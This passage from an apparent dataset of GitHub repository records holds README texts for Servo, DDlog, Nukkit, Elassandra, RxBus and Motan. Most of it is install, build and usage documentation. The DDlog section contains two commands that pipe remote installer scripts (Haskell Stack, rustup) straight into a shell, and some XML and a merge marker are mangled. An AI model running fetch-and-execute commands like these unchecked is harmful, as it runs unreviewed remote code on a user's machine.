* **Keep It Simple**: It should be trivial to expose metrics and publish metrics without having to write lots of code such as [MBean interfaces](http://docs.oracle.com/javase/tutorial/jmx/mbeans/standard.html).
* **Flexible Publishing**: Once metrics are exposed, it should be easy to regularly poll the metrics and make them available for internal reporting systems, logs, and services like [Amazon CloudWatch](http://aws.amazon.com/cloudwatch/).
This has already been implemented inside of Netflix and most of our applications currently use it.
## Project Details
### Build Status
[![Build Status](https://travis-ci.org/Netflix/servo.svg)](https://travis-ci.org/Netflix/servo/builds)
### Versioning
Servo is released with a 0.X.Y version because it has not yet reached full API stability.
Given a version number MAJOR.MINOR.PATCH, increment the:
* MINOR version when there are binary incompatible changes, and
* PATCH version when new functionality or bug fixes are backwards compatible.
### Documentation
* [GitHub Wiki](https://github.com/Netflix/servo/wiki)
* [Javadoc](http://netflix.github.io/servo/current/servo-core/docs/javadoc/)
### Communication
* Google Group: [Netflix Atlas](https://groups.google.com/forum/#!forum/netflix-atlas)
* For bugs, feedback, questions and discussion please use [GitHub Issues](https://github.com/Netflix/servo/issues).
* If you want to help contribute to the project, see [CONTRIBUTING.md](https://github.com/Netflix/servo/blob/master/CONTRIBUTING.md) for details.
## Project Usage
### Build
To build the Servo project:
```
$ git clone https://github.com/Netflix/servo.git
$ cd servo
$ ./gradlew build
```
More details can be found on the [Getting Started](https://github.com/Netflix/servo/wiki/Getting-Started) page of the wiki.
### Binaries
Binaries and dependency information can be found at [Maven Central](http://search.maven.org/#search%7Cga%7C1%7Ccom.netflix.servo).
Maven Example:
```
com.netflix.servoservo-core0.12.7
```
Ivy Example:
```
```
## License
Copyright 2012-2016 Netflix, Inc.
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
vmware/differential-datalog,master,1332,115,2018-03-20T20:14:11Z,309115,136,DDlog is a programming language for incremental computation. It is well suited for writing programs that continuously update their output in response to input changes. A DDlog programmer does not write incremental algorithms; instead they specify the desired input-output mapping in a declarative manner.,datalog ddlog incremental programming-language rust,"[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT)
[![CI workflow](https://github.com/vmware/differential-datalog/actions/workflows/main.yml/badge.svg)](https://github.com/vmware/differential-datalog/actions)
[![pipeline status](https://gitlab.com/ddlog/differential-datalog/badges/master/pipeline.svg)](https://gitlab.com/ddlog/differential-datalog/commits/master)
[![rustc](https://img.shields.io/badge/rustc-1.52.1+-blue.svg)](https://blog.rust-lang.org/2021/05/10/Rust-1.52.1.html)
[![Gitter chat](https://badges.gitter.im/vmware/differential-datalog.png)](https://gitter.im/vmware/differential-datalog)
# Differential Datalog (DDlog)
DDlog is a programming language for *incremental computation*. It is well suited for
writing programs that continuously update their output in response to input changes. With DDlog,
the programmer does not need to worry about writing incremental algorithms.
Instead they specify the desired input-output mapping in a declarative manner, using a dialect of Datalog.
The DDlog compiler then synthesizes an efficient incremental implementation.
DDlog is based on [Frank McSherry's](https://github.com/frankmcsherry/)
excellent [differential dataflow](https://github.com/TimelyDataflow/differential-dataflow) library.
DDlog has the following key properties:
1. **Relational**: A DDlog program transforms a set of input relations (or tables) into a set of output relations.
It is thus well suited for applications that operate on relational data, ranging from real-time analytics to
cloud management systems and static program analysis tools.
2. **Dataflow-oriented**: At runtime, a DDlog program accepts a *stream of updates* to input relations.
Each update inserts, deletes, or modifies a subset of input records. DDlog responds to an input update
by outputting an update to its output relations.
3. **Incremental**: DDlog processes input updates by performing the minimum amount of work
necessary to compute changes to output relations. This has significant performance benefits for many queries.
4. **Bottom-up**: DDlog starts from a set of input facts and
computes *all* possible derived facts by following user-defined rules, in a bottom-up fashion. In
contrast, top-down engines are optimized to answer individual user queries without computing all
possible facts ahead of time. For example, given a Datalog program that computes pairs of connected
vertices in a graph, a bottom-up engine maintains the set of all such pairs. A top-down engine, on
the other hand, is triggered by a user query to determine whether a pair of vertices is connected
and handles the query by searching for a derivation chain back to ground facts. The bottom-up
approach is preferable in applications where all derived facts must be computed ahead of time and in
applications where the cost of initial computation is amortized across a large number of queries.
5. **In-memory**: DDlog stores and processes data in memory. In a typical use case, a DDlog program
is used in conjunction with a persistent database, with database records being fed to DDlog as
ground facts and the derived facts computed by DDlog being written back to the database.
At the moment, DDlog can only operate on databases that completely fit the memory of a single
machine. We are working on a distributed version of DDlog that will be able to
partition its state and computation across multiple machines.
6. **Typed**: In its classical textbook form Datalog is more of a mathematical formalism than a
practical tool for programmers. In particular, pure Datalog does not have concepts like types,
arithmetics, strings or functions. To facilitate writing of safe, clear, and concise code, DDlog
extends pure Datalog with:
1. A powerful type system, including Booleans, unlimited precision integers, bitvectors, floating point numbers, strings,
tuples, tagged unions, vectors, sets, and maps. All of these types can be
stored in DDlog relations and manipulated by DDlog rules. Thus, with DDlog
one can perform relational operations, such as joins, directly over structured data,
without having to flatten it first (as is often done in SQL databases).
2. Standard integer, bitvector, and floating point arithmetic.
3. A simple procedural language that allows expressing many computations natively in DDlog without resorting to external functions.
4. String operations, including string concatenation and interpolation.
5. Syntactic sugar for writing imperative-style code using for/let/assignments.
7. **Integrated**: while DDlog programs can be run interactively via a command line interface, its
primary use case is to integrate with other applications that require deductive database
functionality. A DDlog program is compiled into a Rust library that can be linked against a Rust,
C/C++, Java, or Go program (bindings for other languages can be easily added). This enables good performance,
but somewhat limits the flexibility, as changes to the relational schema or rules require re-compilation.
## Documentation
- Follow the [tutorial](doc/tutorial/tutorial.md) for a step-by-step introduction to DDlog.
- DDlog [language reference](doc/language_reference/language_reference.md).
- DDlog [command reference](doc/command_reference/command_reference.md) for writing and testing your own Datalog programs.
- [How to](doc/java_api.md) use DDlog from Java.
- [How to](doc/c_tutorial/c_tutorial.rst) use DDlog from C.
- [How to](go/README.md) use DDlog from Go and [Go API documentation](https://pkg.go.dev/github.com/vmware/differential-datalog/go/pkg/ddlog).
- [How to](test/datalog_tests/rust_api_test) use DDlog from Rust (by example)
- [Tutorial](doc/profiling/profiling.md) on profiling DDlog programs
- [DDlog overview paper](doc/datalog2.0-workshop/paper.pdf), Datalog 2.0 workshop, 2019.
## Installation
### Installing DDlog from a binary release
To install a precompiled version of DDlog, download the [latest binary release](https://github.com/vmware/differential-datalog/releases), extract it from archive, add `ddlog/bin` to your `$PATH`, and set `$DDLOG_HOME` to point to the `ddlog` directory. You will also need to install the Rust toolchain (see instructions below).
If you're using OS X, you will need to override the binary's security settings through [these instructions](https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac). Else, when first running the DDlog compiler (through calling `ddlog`), you will get the following warning dialog:
```
""ddlog"" cannot be opened because the developer cannot be verified.
macOS cannot verify that this app is free from malware.
```
You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md).
### Compiling DDlog from sources
#### Installing dependencies manually
- Haskell [stack](https://github.com/commercialhaskell/stack):
```
wget -qO- https://get.haskellstack.org/ | sh
```
- Rust toolchain v1.52.1 or later:
```
curl https://sh.rustup.rs -sSf | sh
. $HOME/.cargo/env
rustup component add rustfmt
rustup component add clippy
```
**Note:** The `rustup` script adds path to Rust toolchain binaries (typically, `$HOME/.cargo/bin`)
to `~/.profile`, so that it becomes effective at the next login attempt. To configure your current
shell run `source $HOME/.cargo/env`.
- JDK, e.g.:
```
apt install default-jdk
```
- Google FlatBuffers library. Download and build FlatBuffers release 1.11.0 from
[github](https://github.com/google/flatbuffers/releases/tag/v1.11.0). Make sure
that the `flatc` tool is in your `$PATH`. Additionally, make sure that FlatBuffers
Java classes are in your `$CLASSPATH`:
```
./tools/install-flatbuf.sh
cd flatbuffers
export CLASSPATH=`pwd`""/java"":$CLASSPATH
export PATH=`pwd`:$PATH
cd ..
```
- Static versions of the following libraries: `libpthread.a`, `libc.a`, `libm.a`, `librt.a`, `libutil.a`,
`libdl.a`, `libgmp.a`, and `libstdc++.a` can be installed from distro-specific packages. On Ubuntu:
```
apt install libc6-dev libgmp-dev
```
On Fedora:
```
dnf install glibc-static gmp-static libstdc++-static
```
#### Building
To build the software once you've installed the dependencies using one of the
above methods, clone this repository and set `$DDLOG_HOME` variable to point
to the root of the repository. Run
```
stack build
```
anywhere inside the repository to build the DDlog compiler.
To install DDlog binaries in Haskell stack's default binary directory:
```
stack install
```
To install to a different location:
```
stack install --local-bin-path
```
To test basic DDlog functionality:
```
stack test --ta '-p path'
```
**Note:** this takes a few minutes
You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md).
### vim syntax highlighting
The easiest way to enable differential datalog syntax highlighting for `.dl` files in Vim is by
creating a symlink from `/tools/vim/syntax/dl.vim` into `~/.vim/syntax/`.
If you are using a plugin manager you may be able to directly consume the file from the upstream
repository as well. In the case of [`Vundle`](https://github.com/VundleVim/Vundle.vim), for example,
configuration could look as follows:
```vim
call vundle#begin('~/.config/nvim/bundle')
...
Plugin 'vmware/differential-datalog', {'rtp': 'tools/vim'} <---- relevant line
...
call vundle#end()
```
## Debugging with GHCi
To run the test suite with the GHCi debugger:
```
stack ghci --ghci-options -isrc --ghci-options -itest differential-datalog:differential-datalog-test
```
and type `do main` in the command prompt.
## Building with profiling info enabled
```
stack clean
```
followed by
```
stack build --profile
```
or
```
stack test --profile
```
"
CloudburstMC/Nukkit,master,1179,415,2017-12-04T19:55:58Z,27217,169,Cloudburst Nukkit - Nuclear-Powered Minecraft: Bedrock Edition Server Software,bedrock bedrock-edition bedrock-engine java mcbe mcbe-server mcpe mcpe-server minecraft minecraft-server nukkit pocket-edition,"![nukkit](.github/images/banner.png)
[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](LICENSE)
[![Build Status](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/badge/icon)](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/)
[![Discord](https://img.shields.io/discord/393465748535640064.svg)](https://discord.gg/5PzMkyK)
Introduction
-------------
Nukkit is nuclear-powered server software for Minecraft: Pocket Edition.
It has a few key advantages over other server software:
* Written in Java, Nukkit is faster and more stable.
* Having a friendly structure, it's easy to contribute to Nukkit's development and rewrite plugins from other platforms into Nukkit plugins.
Nukkit is **under improvement** yet, we welcome contributions.
Links
--------------------
* __[News](https://nukkitx.com)__
* __[Forums](https://nukkitx.com/forums)__
* __[Discord](https://discord.gg/5PzMkyK)__
* __[Download](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master)__
* __[Plugins](https://nukkitx.com/resources/categories/nukkit-plugins.1)__
* __[Wiki](https://nukkitx.com/wiki/nukkit)__
Contributing
-------------
Please read the [CONTRIBUTING](.github/CONTRIBUTING.md) guide before submitting any issue. Issues with insufficient information or in the wrong format will be closed and will not be reviewed.
Build JAR file
-------------
- `git clone https://github.com/CloudburstMC/Nukkit`
- `cd Nukkit`
- `git submodule update --init`
- `./gradlew shadowJar`
The compiled JAR can be found in the `target/` directory.
Running
-------------
Simply run `java -jar nukkit-1.0-SNAPSHOT.jar`.
Plugin API
-------------
Information on Nukkit's API can be found at the [wiki](https://nukkitx.com/wiki/nukkit/).
Docker
-------------
Running Nukkit in [Docker](https://www.docker.com/) (17.05+ or higher).
Build image from the source,
```
docker build -t nukkit .
```
Run once to generate the `nukkit-data` volume, default settings, and choose language,
```
docker run -it -p 19132:19132/udp -v nukkit-data:/data nukkit
```
Docker Compose
-------------
Use [docker-compose](https://docs.docker.com/compose/overview/) to start server on port `19132` and with `nukkit-data` volume,
```
docker-compose up -d
```
Kubernetes & Helm
-------------
Validate the chart:
`helm lint charts/nukkit`
Dry run and print out rendered YAML:
`helm install --dry-run --debug nukkit charts/nukkit`
Install the chart:
`helm install nukkit charts/nukkit`
Or, with some different values:
```
helm install nukkit \
--set image.tag=""arm64"" \
--set service.type=""LoadBalancer"" \
charts/nukkit
```
Or, the same but with a custom values from a file:
```
helm install nukkit \
-f helm-values.local.yaml \
charts/nukkit
```
Upgrade the chart:
`helm upgrade nukkit charts/nukkit`
Testing after deployment:
`helm test nukkit`
Completely remove the chart:
`helm uninstall nukkit`
"
strapdata/elassandra,v6.8.4-strapdata,1708,198,2015-08-22T13:52:08Z,457428,60,Elassandra = Elasticsearch + Apache Cassandra,aggregation cassandra completion elasticsearch fuzzy-search kibana logstash lucene masterless mission-critical nosql rest-api search spark,"# Elassandra [![Build Status](https://travis-ci.org/strapdata/elassandra.svg)](https://travis-ci.org/strapdata/elassandra) [![Documentation Status](https://readthedocs.org/projects/elassandra/badge/?version=latest)](https://elassandra.readthedocs.io/en/latest/?badge=latest) [![GitHub release](https://img.shields.io/github/v/release/strapdata/elassandra.svg)](https://github.com/strapdata/elassandra/releases/latest)
[![Twitter](https://img.shields.io/twitter/follow/strapdataio?style=social)](https://twitter.com/strapdataio)
![Elassandra Logo](elassandra-logo.png)
## [http://www.elassandra.io/](http://www.elassandra.io/)
Elassandra is an [Apache Cassandra](http://cassandra.apache.org) distribution including an [Elasticsearch](https://github.com/elastic/elasticsearch) search engine.
Elassandra is a multi-master multi-cloud database and search engine with support for replicating across multiple datacenters in active/active mode.
Elasticsearch code is embedded in Cassanda nodes providing advanced search features on Cassandra tables and Cassandra serves as an Elasticsearch data and configuration store.
![Elassandra architecture](/docs/elassandra/source/images/elassandra1.jpg)
Elassandra supports Cassandra vnodes and scales horizontally by adding more nodes without the need to reshard indices.
Project documentation is available at [doc.elassandra.io](http://doc.elassandra.io).
## Benefits of Elassandra
For Cassandra users, elassandra provides Elasticsearch features :
* Cassandra updates are indexed in Elasticsearch.
* Full-text and spatial search on your Cassandra data.
* Real-time aggregation (does not require Spark or Hadoop to GROUP BY)
* Provide search on multiple keyspaces and tables in one query.
* Provide automatic schema creation and support nested documents using [User Defined Types](https://docs.datastax.com/en/cql/3.1/cql/cql_using/cqlUseUDT.html).
* Provide read/write JSON REST access to Cassandra data.
* Numerous Elasticsearch plugins and products like [Kibana](https://www.elastic.co/guide/en/kibana/current/introduction.html).
* Manage concurrent elasticsearch mappings changes and applies batched atomic CQL schema changes.
* Support [Elasticsearch ingest processors](https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html) allowing to transform input data.
For Elasticsearch users, elassandra provides useful features :
* Elassandra is masterless. Cluster state is managed through [cassandra lightweight transactions](http://www.datastax.com/dev/blog/lightweight-transactions-in-cassandra-2-0).
* Elassandra is a sharded multi-master database, where Elasticsearch is sharded master-slave. Thus, Elassandra has no Single Point Of Write, helping to achieve high availability.
* Elassandra inherits Cassandra data repair mechanisms (hinted handoff, read repair and nodetool repair) providing support for **cross datacenter replication**.
* When adding a node to an Elassandra cluster, only data pulled from existing nodes are re-indexed in Elasticsearch.
* Cassandra could be your unique datastore for indexed and non-indexed data. It's easier to manage and secure. Source documents are now stored in Cassandra, reducing disk space if you need a NoSQL database and Elasticsearch.
* Write operations are not restricted to one primary shard, but distributed across all Cassandra nodes in a virtual datacenter. The number of shards does not limit your write throughput. Adding elassandra nodes increases both read and write throughput.
* Elasticsearch indices can be replicated among many Cassandra datacenters, allowing write to the closest datacenter and search globally.
* The [cassandra driver](http://www.planetcassandra.org/client-drivers-tools/) is Datacenter and Token aware, providing automatic load-balancing and failover.
* Elassandra efficiently stores Elasticsearch documents in binary SSTables without any JSON overhead.
## Quick start
* [Quick Start](http://doc.elassandra.io/en/latest/quickstart.html) guide to run a single node Elassandra cluster in docker.
* [Deploy Elassandra by launching a Google Kubernetes Engine](./docs/google-kubernetes-tutorial.md):
[![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/strapdata/elassandra-google-k8s-marketplace&tutorial=docs/google-kubernetes-tutorial.md)
## Upgrade Instructions
#### Elassandra 6.8.4.2+
<<<<<<< HEAD
Since version 6.8.4.2, the gossip X1 application state can be compressed using a system property. Enabling this settings allows the creation of a lot of virtual indices.
Before enabling this setting, upgrade all the 6.8.4.x nodes to the 6.8.4.2 (or higher). Once all the nodes are in 6.8.4.2, they are able to decompress the application state even if the settings isn't yet configured locally.
#### Elassandra 6.2.3.25+
Elassandra use the Cassandra GOSSIP protocol to manage the Elasticsearch routing table and Elassandra 6.8.4.2+ add support for compression of
the X1 application state to increase the maxmimum number of Elasticsearch indices. For backward compatibility, the compression is disabled by default,
but once all your nodes are upgraded into version 6.8.4.2+, you should enable the X1 compression by adding **-Des.compress_x1=true** in your **conf/jvm.options** and rolling restart all nodes.
Nodes running version 6.8.4.2+ are able to read compressed and not compressed X1.
#### Elassandra 6.2.3.21+
Before version 6.2.3.21, the Cassandra replication factor for the **elasic_admin** keyspace (and elastic_admin_[datacenter.group]) was automatically adjusted to the
number of nodes of the datacenter. Since version 6.2.3.21 and because it has a performance impact on large clusters, it's now up to your Elassandra administrator to
properly adjust the replication factor for this keyspace. Keep in mind that Elasticsearch mapping updates rely on a PAXOS transaction that requires QUORUM nodes to succeed,
so replication factor should be at least 3 on each datacenter.
#### Elassandra 6.2.3.19+
Elassandra 6.2.3.19 metadata version now relies on the Cassandra table **elastic_admin.metadata_log** (that was **elastic_admin.metadata** from 6.2.3.8 to 6.2.3.18)
to keep the elasticsearch mapping update history and automatically recover from a possible PAXOS write timeout issue.
When upgrading the first node of a cluster, Elassandra automatically copy the current **metadata.version** into the new **elastic_admin.metadata_log** table.
To avoid Elasticsearch mapping inconsistency, you must avoid mapping update while the rolling upgrade is in progress. Once all nodes are upgraded,
the **elastic_admin.metadata** is not more used and can be removed. Then, you can get the mapping update history from the new **elastic_admin.metadata_log** and know
which node has updated the mapping, when and for which reason.
#### Elassandra 6.2.3.8+
Elassandra 6.2.3.8+ now fully manages the elasticsearch mapping in the CQL schema through the use of CQL schema extensions (see *system_schema.tables*, column *extensions*). These table extensions and the CQL schema updates resulting of elasticsearch index creation/modification are updated in batched atomic schema updates to ensure consistency when concurrent updates occurs. Moreover, these extensions are stored in binary and support partial updates to be more efficient. As the result, the elasticsearch mapping is not more stored in the *elastic_admin.metadata* table.
WARNING: During the rolling upgrade, elasticserach mapping changes are not propagated between nodes running the new and the old versions, so don't change your mapping while you're upgrading. Once all your nodes have been upgraded to 6.2.3.8+ and validated, apply the following CQL statements to remove useless elasticsearch metadata:
```bash
ALTER TABLE elastic_admin.metadata DROP metadata;
ALTER TABLE elastic_admin.metadata WITH comment = '';
```
WARNING: Due to CQL table extensions used by Elassandra, some old versions of **cqlsh** may lead to the following error message **""'module' object has no attribute 'viewkeys'.""**. This comes from the old python cassandra driver embedded in Cassandra and has been reported in [CASSANDRA-14942](https://issues.apache.org/jira/browse/CASSANDRA-14942). Possible workarounds:
* Use the **cqlsh** embedded with Elassandra
* Install a recent version of the **cqlsh** utility (*pip install cqlsh*) or run it from a docker image:
```bash
docker run -it --rm strapdata/cqlsh:0.1 node.example.com
```
#### Elassandra 6.x changes
* Elasticsearch now supports only one document type per index backed by one Cassandra table. Unless you specify an elasticsearch type name in your mapping, data is stored in a cassandra table named **""_doc""**. If you want to search many cassandra tables, you now need to create and search many indices.
* Elasticsearch 6.x manages shard consistency through several metadata fields (_primary_term, _seq_no, _version) that are not used in elassandra because replication is fully managed by cassandra.
## Installation
Ensure Java 8 is installed and `JAVA_HOME` points to the correct location.
* [Download](https://github.com/strapdata/elassandra/releases) and extract the distribution tarball
* Define the CASSANDRA_HOME environment variable : `export CASSANDRA_HOME=`
* Run `bin/cassandra -e`
* Run `bin/nodetool status`
* Run `curl -XGET localhost:9200/_cluster/state`
#### Example
Try indexing a document on a non-existing index:
```bash
curl -XPUT 'http://localhost:9200/twitter/_doc/1?pretty' -H 'Content-Type: application/json' -d '{
""user"": ""Poulpy"",
""post_date"": ""2017-10-04T13:12:00Z"",
""message"": ""Elassandra adds dynamic mapping to Cassandra""
}'
```
Then look-up in Cassandra:
```bash
bin/cqlsh -e ""SELECT * from twitter.\""_doc\""""
```
Behind the scenes, Elassandra has created a new Keyspace `twitter` and table `_doc`.
```CQL
admin@cqlsh>DESC KEYSPACE twitter;
CREATE KEYSPACE twitter WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '1'} AND durable_writes = true;
CREATE TABLE twitter.""_doc"" (
""_id"" text PRIMARY KEY,
message list,
post_date list,
user list
) WITH bloom_filter_fp_chance = 0.01
AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'}
AND comment = ''
AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'}
AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'}
AND crc_check_chance = 1.0
AND dclocal_read_repair_chance = 0.1
AND default_time_to_live = 0
AND gc_grace_seconds = 864000
AND max_index_interval = 2048
AND memtable_flush_period_in_ms = 0
AND min_index_interval = 128
AND read_repair_chance = 0.0
AND speculative_retry = '99PERCENTILE';
CREATE CUSTOM INDEX elastic__doc_idx ON twitter.""_doc"" () USING 'org.elassandra.index.ExtendedElasticSecondaryIndex';
```
By default, multi valued Elasticsearch fields are mapped to Cassandra list.
Now, insert a row with CQL :
```CQL
INSERT INTO twitter.""_doc"" (""_id"", user, post_date, message)
VALUES ( '2', ['Jimmy'], [dateof(now())], ['New data is indexed automatically']);
SELECT * FROM twitter.""_doc"";
_id | message | post_date | user
-----+--------------------------------------------------+-------------------------------------+------------
2 | ['New data is indexed automatically'] | ['2019-07-04 06:00:21.893000+0000'] | ['Jimmy']
1 | ['Elassandra adds dynamic mapping to Cassandra'] | ['2017-10-04 13:12:00.000000+0000'] | ['Poulpy']
(2 rows)
```
Then search for it with the Elasticsearch API:
```bash
curl ""localhost:9200/twitter/_search?q=user:Jimmy&pretty""
```
And here is a sample response :
```JSON
{
""took"" : 3,
""timed_out"" : false,
""_shards"" : {
""total"" : 1,
""successful"" : 1,
""skipped"" : 0,
""failed"" : 0
},
""hits"" : {
""total"" : 1,
""max_score"" : 0.6931472,
""hits"" : [
{
""_index"" : ""twitter"",
""_type"" : ""_doc"",
""_id"" : ""2"",
""_score"" : 0.6931472,
""_source"" : {
""post_date"" : ""2019-07-04T06:00:21.893Z"",
""message"" : ""New data is indexed automatically"",
""user"" : ""Jimmy""
}
}
]
}
}
```
## Support
* Commercial support is available through [Strapdata](http://www.strapdata.com/).
* Community support available via [elassandra google groups](https://groups.google.com/forum/#!forum/elassandra).
* Post feature requests and bugs on https://github.com/strapdata/elassandra/issues
## License
```
This software is licensed under the Apache License, version 2 (""ALv2""), quoted below.
Copyright 2015-2018, Strapdata (contact@strapdata.com).
Licensed under the Apache License, Version 2.0 (the ""License""); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
```
## Acknowledgments
* Elasticsearch, Logstash, Beats and Kibana are trademarks of Elasticsearch BV, registered in the U.S. and in other countries.
* Apache Cassandra, Apache Lucene, Apache, Lucene and Cassandra are trademarks of the Apache Software Foundation.
* Elassandra is a trademark of Strapdata SAS.
"
AndroidKnife/RxBus,master,2143,223,2015-11-25T10:36:57Z,195,1,Event Bus By RxJava.,rxandroid rxbus rxjava rxjava2,"RxBus - An event bus by [ReactiveX/RxJava](https://github.com/ReactiveX/RxJava)/[ReactiveX/RxAndroid](https://github.com/ReactiveX/RxAndroid)
=============================
This is an event bus designed to allowing your application to communicate efficiently.
I have use it in many projects, and now i think maybe someone would like it, so i publish it.
RxBus support annotations(@produce/@subscribe), and it can provide you to produce/subscribe on other thread
like MAIN_THREAD, NEW_THREAD, IO, COMPUTATION, TRAMPOLINE, IMMEDIATE, even the EXECUTOR and HANDLER thread,
more in [EventThread](rxbus/src/main/java/com/hwangjr/rxbus/thread/EventThread.java).
Also RxBus provide the event tag to define the event. The method's first (and only) parameter and tag defines the event type.
**Thanks to:**
[square/otto](https://github.com/square/otto)
[greenrobot/EventBus](https://github.com/greenrobot/EventBus)
Usage
--------
Just 2 Steps:
**STEP 1**
Add dependency to your gradle file:
```groovy
compile 'com.hwangjr.rxbus:rxbus:3.0.0'
```
Or maven:
``` xml
com.hwangjr.rxbusrxbus3.0.0aar
```
**TIP:** Maybe you also use the [JakeWharton/timber](https://github.com/JakeWharton/timber) to log your message, you may need to exclude the timber (from version 1.0.4, timber dependency update from [AndroidKnife/Utils/timber](https://github.com/AndroidKnife/Utils/tree/master/timber) to JakeWharton):
``` groovy
compile ('com.hwangjr.rxbus:rxbus:3.0.0') {
exclude group: 'com.jakewharton.timber', module: 'timber'
}
```
en
Snapshots of the development version are available in [Sonatype's `snapshots` repository](https://oss.sonatype.org/content/repositories/snapshots/).
**STEP 2**
Just use the provided(Any Thread Enforce):
``` java
com.hwangjr.rxbus.RxBus
```
Or make RxBus instance is a better choice:
``` java
public static final class RxBus {
private static Bus sBus;
public static synchronized Bus get() {
if (sBus == null) {
sBus = new Bus();
}
return sBus;
}
}
```
Add the code where you want to produce/subscribe events, and register and unregister the class.
``` java
public class MainActivity extends AppCompatActivity {
...
@Override
protected void onCreate(Bundle savedInstanceState) {
...
RxBus.get().register(this);
...
}
@Override
protected void onDestroy() {
...
RxBus.get().unregister(this);
...
}
@Subscribe
public void eat(String food) {
// purpose
}
@Subscribe(
thread = EventThread.IO,
tags = {
@Tag(BusAction.EAT_MORE)
}
)
public void eatMore(List foods) {
// purpose
}
@Produce
public String produceFood() {
return ""This is bread!"";
}
@Produce(
thread = EventThread.IO,
tags = {
@Tag(BusAction.EAT_MORE)
}
)
public List produceMoreFood() {
return Arrays.asList(""This is breads!"");
}
public void post() {
RxBus.get().post(this);
}
public void postByTag() {
RxBus.get().post(Constants.EventType.TAG_STORY, this);
}
...
}
```
**That is all done!**
Lint
--------
Features
--------
* JUnit test
* Docs
History
--------
Here is the [CHANGELOG](CHANGELOG.md).
FAQ
--------
**Q:** How to do pull requests?
**A:** Ensure good code quality and consistent formatting.
License
--------
Copyright 2015 HwangJR, Inc.
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
weibocom/motan,master,5872,1780,2016-04-20T10:56:17Z,4340,356,A cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.,,"# Motan
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/weibocom/motan/blob/master/LICENSE)
[![Maven Central](https://img.shields.io/maven-central/v/com.weibo/motan.svg?label=Maven%20Central)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.weibo%22%20AND%20motan)
[![Build Status](https://img.shields.io/travis/weibocom/motan/master.svg?label=Build)](https://travis-ci.org/weibocom/motan)
[![OpenTracing-1.0 Badge](https://img.shields.io/badge/OpenTracing--1.0-enabled-blue.svg)](http://opentracing.io)
[![Skywalking Tracing](https://img.shields.io/badge/Skywalking%20Tracing-enable-brightgreen.svg)](https://github.com/OpenSkywalking/skywalking)
# Overview
Motan is a cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.
Related projects in Motan ecosystem:
- [Motan-go](https://github.com/weibocom/motan-go) is golang implementation.
- [Motan-PHP](https://github.com/weibocom/motan-php) is PHP client can interactive with Motan server directly or through Motan-go agent.
- [Motan-openresty](https://github.com/weibocom/motan-openresty) is a Lua(Luajit) implementation based on [Openresty](http://openresty.org).
# Features
- Create distributed services without writing extra code.
- Provides cluster support and integrate with popular service discovery services like [Consul][consul] or [Zookeeper][zookeeper].
- Supports advanced scheduling features like weighted load-balance, scheduling cross IDCs, etc.
- Optimization for high load scenarios, provides high availability in production environment.
- Supports both synchronous and asynchronous calls.
- Support cross-language interactive with Golang, PHP, Lua(Luajit), etc.
# Quick Start
The quick start gives very basic example of running client and server on the same machine. For the detailed information about using and developing Motan, please jump to [Documents](#documents).
> The minimum requirements to run the quick start are:
>
> - JDK 1.8 or above
> - A java-based project management software like [Maven][maven] or [Gradle][gradle]
## Synchronous calls
1. Add dependencies to pom.
```xml
1.1.12com.weibomotan-core${motan.version}com.weibomotan-transport-netty${motan.version}com.weibomotan-springsupport${motan.version}org.springframeworkspring-context4.2.4.RELEASE
```
2. Create an interface for both service provider and consumer.
`src/main/java/quickstart/FooService.java`
```java
package quickstart;
public interface FooService {
public String hello(String name);
}
```
3. Write an implementation, create and start RPC Server.
`src/main/java/quickstart/FooServiceImpl.java`
```java
package quickstart;
public class FooServiceImpl implements FooService {
public String hello(String name) {
System.out.println(name + "" invoked rpc service"");
return ""hello "" + name;
}
}
```
`src/main/resources/motan_server.xml`
```xml
```
`src/main/java/quickstart/Server.java`
```java
package quickstart;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
public class Server {
public static void main(String[] args) throws InterruptedException {
ApplicationContext applicationContext = new ClassPathXmlApplicationContext(""classpath:motan_server.xml"");
System.out.println(""server start..."");
}
}
```
Execute main function in Server will start a motan server listening on port 8002.
4. Create and start RPC Client.
`src/main/resources/motan_client.xml`
```xml
```
`src/main/java/quickstart/Client.java`
```java
package quickstart;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
public class Client {
public static void main(String[] args) throws InterruptedException {
